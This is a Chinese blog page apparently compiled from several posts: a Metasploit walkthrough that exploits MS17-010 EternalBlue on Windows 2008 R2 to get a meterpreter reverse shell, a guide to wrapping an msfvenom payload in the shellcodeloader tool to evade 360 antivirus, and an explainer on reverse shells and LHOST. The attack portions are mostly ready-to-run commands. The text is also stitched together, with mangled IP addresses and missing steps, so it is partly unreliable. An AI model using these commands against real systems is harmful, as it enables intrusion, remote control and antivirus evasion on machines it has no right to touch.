
0x01 实验环境
攻击机:kali linux
ip:101010131
目标机:windows 2008 R2
ip:101010132
0x02 配置exploit
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 101010132
rhost => 101010132
查看选项
msf exploit(ms17_010_eternalblue) > show options
设置目标机的IP,其他选项默认就可以;
注意:选项中说明了此exploit对应的目标系统,所以并不是具有该漏洞的系统都能利用此exploit;
0x03 配置payload
payload只需要配置监听返回会话的IP;
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 101010131
lhost => 101010131
0x04 开始攻击
警告:攻击过程可能导致目标系统宕机重启,谨慎 *** 作!
msf exploit(ms17_010_eternalblue) > exploit
成功获得session。
shell 进入主机 *** 作
工具地址: shellcodeloader
不想自己编译,就用工具作者自己编译的成品, realse
MSF生成 bin 文件:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=IP LPORT=port -f raw -o 1bin
将生成好的木马 1bin 拖入 shellcodeloader 中,并勾选所需配置,配置的选择原项目中介绍的很清楚,这里就不过多赘述了,点击Generate就会生成 loaderexe :
绕过360静态查杀:
运行木马,绕过360动态查杀:
MSF正常接收shell:
大佬随手给个赞呗 00
msf的payload中能建立反dshell的,比如reverse_tcp,像是windows/meterpreter/reverse_tcp或者是android/meterpreter/reverse_tcp,它们的LHOST参数(LHOST就是Local host的意思)是攻击方的IP地址,用来监听对方的连接的。其实很好理解,反dshell嘛,就是建立反d连接的,当然是反d到攻击主机了。
如果不是建立反dshell的payload,一般是没有LHOST的,取而代之的是RHOST参数,是目标主机的IP地址。
反dshell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?
有如下情况:
那么反d就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反d连接。
简而言之,反dshell就是要我们的vps服务器设置监听,然后让服务器反d一个shell来连接我们自己的主机,从而使我们能远程控制我们的主机
客户端执行:
服务端成功接收,客户端执行命令成功。
成功反d:
当然由于各种环境不同,服务端不一定有nc,所以还要靠其他手段各显神通。
项目地址: >
以上就是关于ms17010漏洞利用msf | 2019-03-27 ms070-全部的内容,包括:ms17010漏洞利用msf | 2019-03-27 ms070-、免杀工具shellcodeloader、关于kali下msf生成payload的LHOST问题,求解答等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)